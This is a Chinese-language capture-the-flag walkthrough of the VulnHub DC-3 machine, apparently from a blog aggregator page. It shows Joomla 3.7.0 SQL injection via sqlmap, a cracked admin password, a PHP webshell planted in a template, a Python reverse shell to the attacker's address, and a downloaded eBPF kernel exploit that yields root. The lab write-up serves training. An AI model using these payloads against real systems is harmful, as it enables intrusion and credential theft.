当前位置: 首页 > news >正文

Dc-3靶机渗透

Dc-3靶机渗透

靶机地址:https://www.vulnhub.com/entry/dc-32,312/
难度: 低
目标: 获得 root 权限 + flagDC-3是VulnHub推出的渗透测试靶机,主要用于测试Web应用安全和渗透测试技能。其特点是仅开放80端口,运行Apache Web服务器和Joomla CMS,适合初学者练习信息收集、漏洞扫描和权限提升等基础渗透技巧。
基础环境搭建从VulnHub官网或第三方平台获取DC-3靶机镜像文件(如DC-3.zip),并解压至VMware或Kali虚拟机中。:将靶机与攻击机设置为同一NAT模式或桥接模式,确保攻击机与靶机处于同一局域网。 ‌IP使用nmap扫描靶机IP范围(如192.168.96.128/24),确定靶机真实IP(如192.168.96.131)和攻击机IP(如192.168.96.128)。
渗透步骤信息收集使用nmap全面扫描靶机端口和服务,确认80端口开放并识别出Apache/Joomla环境。 ‌通过浏览器访问靶机IP(如http://192.168.96.131),观察首页提示信息。漏洞扫描与利安装:ml-search-more[JoomScan]{text="JoomScan"}工具(通过Kali包管理器安装),针对Joomla CMS进行专项扫描,获取后台地址(如/administrator/)。使用:ml-search-more[nikto]{text="nikto"}扫描Web漏洞或配置错误。权限提尝试弱口令登录后台或利用Joomla已知漏洞(如组件漏洞、配置错误)获取管理员权限。若无法直接突破,可尝试文件上传、SQL注入等常规攻击手段。
注意事项该靶机设计简单,主要考验基础渗透技能,建议结合工具使用(如nmap、JoomScan、nikto)而非纯手工操作。若需增加挑战难度,可尝试关闭辅助提示或调整攻击路径
https://developer.aliyun.com/article/1362873  //相关文档

信息收集

主机发现

1.查看网段

ipconfig192.68.65.132
主机在192.168.65.0网段

2.主机发现

nmap -sn 192.168.65.0/24└─# nmap -sn 192.168.65.0/24                            
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-17 03:17 EDT
Nmap scan report for 192.168.65.1
Host is up (0.00020s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.65.2
Host is up (0.00012s latency).
MAC Address: 00:50:56:FA:BF:D8 (VMware)
Nmap scan report for 192.168.65.147
Host is up (0.00017s latency).
MAC Address: 00:0C:29:4E:5A:03 (VMware)
Nmap scan report for 192.168.65.254
Host is up (0.0049s latency).
MAC Address: 00:50:56:F5:D2:FC (VMware)
Nmap scan report for 192.168.65.132
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.40 seconds

了解到自己的主机结构所以我们的主机是

192.168.65.147

3.端口扫描

nmap -sT --min-rate 10000 -p- 192.168.65.147Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-17 03:19 EDT
Nmap scan report for 192.168.65.147
Host is up (0.0017s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:4E:5A:03 (VMware)Nmap done: 1 IP address (1 host up) scanned in 6.29 seconds

Tcp扫描

nmap -sT -sV -sC -O -p80 192.168.65.147└─# nmap -sT -sV -sC -O -p80 192.168.65.147
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-17 03:31 EDT
Nmap scan report for 192.168.65.147
Host is up (0.00042s latency).PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-generator: Joomla! - Open Source Content Management
|_http-title: Home
MAC Address: 00:0C:29:4E:5A:03 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hopOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.29 seconds

分析

主机状态
IP:192.168.65.147
状态:up,延迟 0.42 ms
MAC:00:0C:29:4E:5A:03(VMware 虚拟机)
端口/服务
80/tcp open
服务:http
软件:Apache httpd 2.4.18 (Ubuntu)
CMS:Joomla!(开源内容管理系统)
页面标题:Home
Server 头:Apache/2.4.18 (Ubuntu)
系统指纹
OS 类型:Linux 3.x – 4.x(大概率 Ubuntu 16.04 内核 4.4)
网络
距离:1 hop(同一网段)
下一步建议
Web 渗透:Joomla 3.x 默认路径 /administrator;用 joomscan 或 joomla-cves 扫漏洞。
目录爆破:gobuster/dirb 扫 http://192.168.65.147/ 找备份、配置、上传点。
获取 shell:若 Joomla 版本 ≤ 3.4.6 可试 CVE-2015-8562 反序列化;≤ 3.7.0 可试 SQL 注入 CVE-2017-8917。

UDP扫描****

nmap -sU --top-ports 20 192.168.65.147

image-20251017152315605

默认脚本扫描

nmap --script=vuln -p80 192.168.65.147
扫描不出来

web渗透

用浏览器打开是这样的

image-20251017152856146

没有任何头绪,我们前面提到爆破我门尝试爆破

目录爆破

dirsearch -u http://192.168.65.147

image-20251017153834205

我们发现有

/administrator/

image-20251017153913873

查看历史漏洞

先用joomscan

1.JoomScan 是一款 开源、专门面向 Joomla CMS 的漏洞扫描器

在kali中直接安装

sudo apt update && sudo apt install joomscan

基础使用

# 基础扫描
joomscan -u http://192.168.65.147# 同时暴力枚举组件
joomscan -u http://192.168.65.147 --enumerate-components# 通过代理扫描
joomscan -u http://192.168.65.147 --proxy http://127.0.0.1:8080

image-20251017154523111

发现版本

查找漏洞

searchsploit Joomla 3.7.0

image-20251017154712670

存在sql注入我们下载文档来看看

cp /usr/share/exploitdb/exploits/php/webapps/42033.txt .
└─# cat 42033.txt                                           
# Exploit Title: Joomla 3.7.0 - Sql Injection
# Date: 05-19-2017
# Exploit Author: Mateus Lino
# Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
# Vendor Homepage: https://www.joomla.org/
# Version: = 3.7.0
# Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux
# CVE : - CVE-2017-8917URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27Using Sqlmap:sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]Parameter: list[fullordering] (GET)Type: boolean-based blindTitle: Boolean-based blind - Parameter replace (DUAL)Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(CASE WHEN (1573=1573) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)Type: error-basedTitle: MySQL >= 5.0 error-based - Parameter replace (FLOOR)Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 6600 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (ELT(6600=6600,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)Type: AND/OR time-based blindTitle: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SELECT(SLEEP(5)))GDiu) 

我们使用sqlmap去尝试注入

sqlmap -u "http://192.168.65.147/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

我们发现

joomladb库
└─# sqlmap -u "http://192.168.65.147/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb --tables

image-20251017155507137

然后直接注入数据库查看账号密码

sqlmap -u "http://192.168.65.147/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T "#__users" --columns

image-20251017155948663

获取密码和账号

sqlmap -u "http://192.168.65.147/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T "#__users" -C username,password --dump

image-20251017160212823

+----------+--------------------------------------------------------------+
| username | password                                                     |
+----------+--------------------------------------------------------------+
| admin    | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |
+----------+--------------------------------------------------------------+

用hash去解

image-20251017160430865

得到密码

snoopy

image-20251017160533582

反弹shell

image-20251017160723583

image-20251017160740330

去创建一个文件

image-20251017160840119

写入一句话木马

<?php system($_GET['cmd']);?>

访问路径

/templates/protostar/shell.php?cmd=id

image-20251017161511058

查看有没有python3

which python3

image-20251017161710981

成功返回

构造反弹shell

python3 -c 'import socket,subprocess,os,pty;s=socket.socket();s.connect(("192.168.65.132",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/bash")'

成功返回

image-20251017162115965

image-20251017162435874

提权

查看系统版本

www-data@DC-3:/var/www/html/templates/protostar$ uname -a
uname -a                                                                                                                                                                                        
Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux                                                                                                
www-data@DC-3:/var/www/html/templates/protostar$ lsb_release -a                                                                                                                                 
lsb_release -a                                                                                                                                                                                  
No LSB modules are available.                                                                                                                                                                   
Distributor ID: Ubuntu                                                                                                                                                                          
Description:    Ubuntu 16.04 LTS                                                                                                                                                                
Release:        16.04                                                                                                                                                                           
Codename:       xenial      

查看历史漏洞

searchsploit Ubuntu 16.04

image-20251017162815276

linux/local/39772.txt

先把文件cp下来

cp /usr/share/exploitdb/exploits/linux/local/39772.txt .
cat 
─# cat 39772.txt                                           
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=808In Linux >=4.4, when the CONFIG_BPF_SYSCALL config option is set and the
kernel.unprivileged_bpf_disabled sysctl is not explicitly set to 1 at runtime,
unprivileged code can use the bpf() syscall to load eBPF socket filter programs.
These conditions are fulfilled in Ubuntu 16.04.When an eBPF program is loaded using bpf(BPF_PROG_LOAD, ...), the first
function that touches the supplied eBPF instructions is
replace_map_fd_with_map_ptr(), which looks for instructions that reference eBPF
map file descriptors and looks up pointers for the corresponding map files.
This is done as follows:/* look for pseudo eBPF instructions that access map FDs and* replace them with actual map pointers*/static int replace_map_fd_with_map_ptr(struct verifier_env *env){struct bpf_insn *insn = env->prog->insnsi;int insn_cnt = env->prog->len;int i, j;for (i = 0; i < insn_cnt; i++, insn++) {[checks for bad instructions]if (insn[0].code == (BPF_LD | BPF_IMM | BPF_DW)) {struct bpf_map *map;struct fd f;[checks for bad instructions]f = fdget(insn->imm);map = __bpf_map_get(f);if (IS_ERR(map)) {verbose("fd %d is not pointing to valid bpf_map\n",insn->imm);fdput(f);return PTR_ERR(map);}[...]}}[...]}__bpf_map_get contains the following code:/* if error is returned, fd is released.* On success caller should complete fd access with matching fdput()*/
struct bpf_map *__bpf_map_get(struct fd f)
{if (!f.file)return ERR_PTR(-EBADF);if (f.file->f_op != &bpf_map_fops) {fdput(f);return ERR_PTR(-EINVAL);}return f.file->private_data;
}The problem is that when the caller supplies a file descriptor number referring
to a struct file that is not an eBPF map, both __bpf_map_get() and
replace_map_fd_with_map_ptr() will call fdput() on the struct fd. If
__fget_light() detected that the file descriptor table is shared with another
task and therefore the FDPUT_FPUT flag is set in the struct fd, this will cause
the reference count of the struct file to be over-decremented, allowing an
attacker to create a use-after-free situation where a struct file is freed
although there are still references to it.A simple proof of concept that causes oopses/crashes on a kernel compiled with
memory debugging options is attached as crasher.tar.One way to exploit this issue is to create a writable file descriptor, start a
write operation on it, wait for the kernel to verify the file's writability,
then free the writable file and open a readonly file that is allocated in the
same place before the kernel writes into the freed file, allowing an attacker
to write data to a readonly file. By e.g. writing to /etc/crontab, root
privileges can then be obtained.There are two problems with this approach:The attacker should ideally be able to determine whether a newly allocated
struct file is located at the same address as the previously freed one. Linux
provides a syscall that performs exactly this comparison for the caller:
kcmp(getpid(), getpid(), KCMP_FILE, uaf_fd, new_fd).In order to make exploitation more reliable, the attacker should be able to
pause code execution in the kernel between the writability check of the target
file and the actual write operation. This can be done by abusing the writev()
syscall and FUSE: The attacker mounts a FUSE filesystem that artificially delays
read accesses, then mmap()s a file containing a struct iovec from that FUSE
filesystem and passes the result of mmap() to writev(). (Another way to do this
would be to use the userfaultfd() syscall.)writev() calls do_writev(), which looks up the struct file * corresponding to
the file descriptor number and then calls vfs_writev(). vfs_writev() verifies
that the target file is writable, then calls do_readv_writev(), which first
copies the struct iovec from userspace using import_iovec(), then performs the
rest of the write operation. Because import_iovec() performs a userspace memory
access, it may have to wait for pages to be faulted in - and in this case, it
has to wait for the attacker-owned FUSE filesystem to resolve the pagefault,
allowing the attacker to suspend code execution in the kernel at that point
arbitrarily.An exploit that puts all this together is in exploit.tar. Usage:user@host:~/ebpf_mapfd_doubleput$ ./compile.sh
user@host:~/ebpf_mapfd_doubleput$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@host:~/ebpf_mapfd_doubleput# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user)This exploit was tested on a Ubuntu 16.04 Desktop system.Fix: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=8358b02bf67d3a5d8a825070e1aa73f25fb2e4c7Proof of Concept: https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552
Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip 

把包下载下来

 wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
在kali主机上开启监听
python -m http.server 80 下载下来
wget http://192.168.65.132/39772.zipuzip 解压tar -xf exploit.tar

利用

.txt文件已经给出


user@host:~/ebpf_mapfd_doubleput$ ./compile.sh
user@host:~/ebpf_mapfd_doubleput$ ./doubleput
www-data@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh
./compile.sh
doubleput.c: In function 'make_setuid':
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast].insns = (__aligned_u64) insns,^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast].license = (__aligned_u64)""^
www-data@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
ls
compile.sh  doubleput  doubleput.c  hello  hello.c  suidhelper  suidhelper.c
www-data@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput
./doubleput

提升交互性

python -c "import pty;pty.spawn('/bin/bash')"

image-20251017165047351

成功拿下

http://www.hskmm.com/?act=detail&tid=33118

相关文章:

  • 【每日Arxiv热文】ICLR2026 !SAM3重磅来袭:能“听懂人话”的分割模型,性能狂飙2倍!
  • 探索 PHP-FPM 进程池的最佳配置方案:参数解析、场景适配与问题解决
  • 生活随感:和谐生活,你我共「营」 - tfel
  • 2025 河道护栏源头厂家最新推荐排行榜权威发布:聚焦全流程服务与高性价比,含新锐品牌优选指南河道绳索护栏/河道景观护栏厂家推荐
  • 10.17 NOIP 模拟赛 T1. 并非贪心
  • 基于 JuiceFS 构建 AI 推理:多模态复杂 I/O、跨云与多租户支持
  • G1 垃圾回收器详解 原理
  • 【转】[C#] GlobalUsing 的使用
  • Qoder 重磅升级,推出 Quest Remote 功能,像发邮件一样将任务委派到云端
  • 2025 年预制舱生产厂家最新推荐排行榜:深度剖析行业领军企业,助力客户精准选购优质产品光伏/电力/模块化/低压/高压/防爆预制舱厂家推荐
  • 2025国际冷链运输推荐腾翼搏时,专业温控医药物流供应商!
  • 2025连铸机设备推荐:瑞熠机械制造,专业生产优质厂家!
  • 2025机电安装优质厂家推荐:华芃机电,专业覆盖多领域安装服务!
  • 【SPIE出版 | ISSN已确定 | 连续4届稳定见刊检索】第五届计算机图形学、人工智能与数据处理国际学术会议 (ICCAID 2025)
  • 2025年低温高湿解冻设备厂家推荐排行榜,专业解冻技术与高效服务的行业首选!
  • 第一周算法设计作业
  • C++基本编程1——数位分离问题
  • 2025高精度流量计厂家推荐:弗罗迈测控系统,技术领先品质卓越!
  • 存储过程循环替代游标
  • 2025多功能防水篷布厂家推荐:成硕达塑业,品质卓越用途广泛!
  • 钉钉接入业务系统在windows系统下的web端无法加载图片
  • 2025危险品运输推荐盘锦畅奥,专业安全服务值得信赖!
  • 2025精密磨床及CNC加工推荐:东莞市品之豪金属制品专业定制!
  • AI元人文构想:一种负责任的文明演化框架研究报告
  • 少时诵诗书上说试试说试试
  • 2025 消防培训学校最新推荐榜:实训实力解析,附选择指南消防考证培训学校推荐
  • 2025年工作服厂家推荐排行榜,春夏秋冬季工作服,工人工作服,车间工作服,防静电工作服公司推荐!
  • JavaScript 中处理日期格式化
  • 2025年在线粘度计厂家推荐排行榜,实验室在线粘度计,工业在线粘度计,高精度在线粘度计公司推荐!
  • 找到M3U8直播源的方法